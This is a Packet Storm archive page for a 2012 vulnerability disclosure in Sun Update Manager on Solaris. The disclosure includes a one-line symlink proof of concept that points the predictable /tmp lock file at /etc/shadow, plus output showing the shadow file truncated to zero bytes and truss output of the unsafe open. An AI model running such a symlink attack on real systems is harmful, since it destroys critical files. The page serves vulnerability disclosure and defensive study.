Sun Update Manager /tmp Clobber

Sun Update Manager /tmp Clobber: Posted Jul 20, 2012; Authored by Larry W. Cashdollar; The Sun Update Manager suffers from a /tmp clobbering vulnerability.; tags | exploit; SHA-256 | 9ed3d1ea271454d9da6b06fca58387916ec1c5bb71e3b0bd7e332c3cde7b3960; Download | Favorite | View

Sun Update Manager /tmp Clobber

(author http://packetstormsecurity.org/user/lcashdol/)


Noticed this during routine patching.

/tmp file clobbering vulnerability in Sun Update manager.
7/15/2012

noticed this while patching my lab solaris system tonight.

larry@s0l4r1s:/tmp$ ln -s /etc/shadow  com.sun.swup.client.LOCK

updatemanager is run

larry@n1caragua:/tmp$ ls -l /etc/shadow
-r--------   1 root     sys          0 Jul 19 18:49 /etc/shadow

SunOS s0l4r1s 5.10 Generic_147441-19 i86pc i386 i86pc
larry@n1caragua:~$ 

truss output:

4841/2:         stat64("/tmp/com.sun.swup.client.LOCK", 0xD03FEAB0) = 0
4841/2:         open64("/tmp/com.sun.swup.client.LOCK", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 5

Top Authors In Last 30 Days

Red Hat 384 files
Ubuntu 91 files
Debian 30 files
BugsBD Limited 21 files
Rahad Chowdhury 21 files
Gentoo 18 files
tmrswrr 12 files
Google Security Research 5 files
Ph0s 5 files
R0ckE7 5 files

File Archives

Systems

AIX (429)
Apple (2,037)
BSD (375)
CentOS (57)
Cisco (1,926)
Debian (6,914)
Fedora (1,692)
FreeBSD (1,246)
Gentoo (4,379)
HPUX (880)
iOS (363)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (47,844)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (486)
RedHat (14,619)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,136)
UNIX (9,340)
UnixWare (187)
Windows (6,606)
Other

Sun Update Manager /tmp Clobber

Sun Update Manager /tmp Clobber

File Archive:

December 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Sun Update Manager /tmp Clobber

Share This

Sun Update Manager /tmp Clobber

File Archive:

December 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems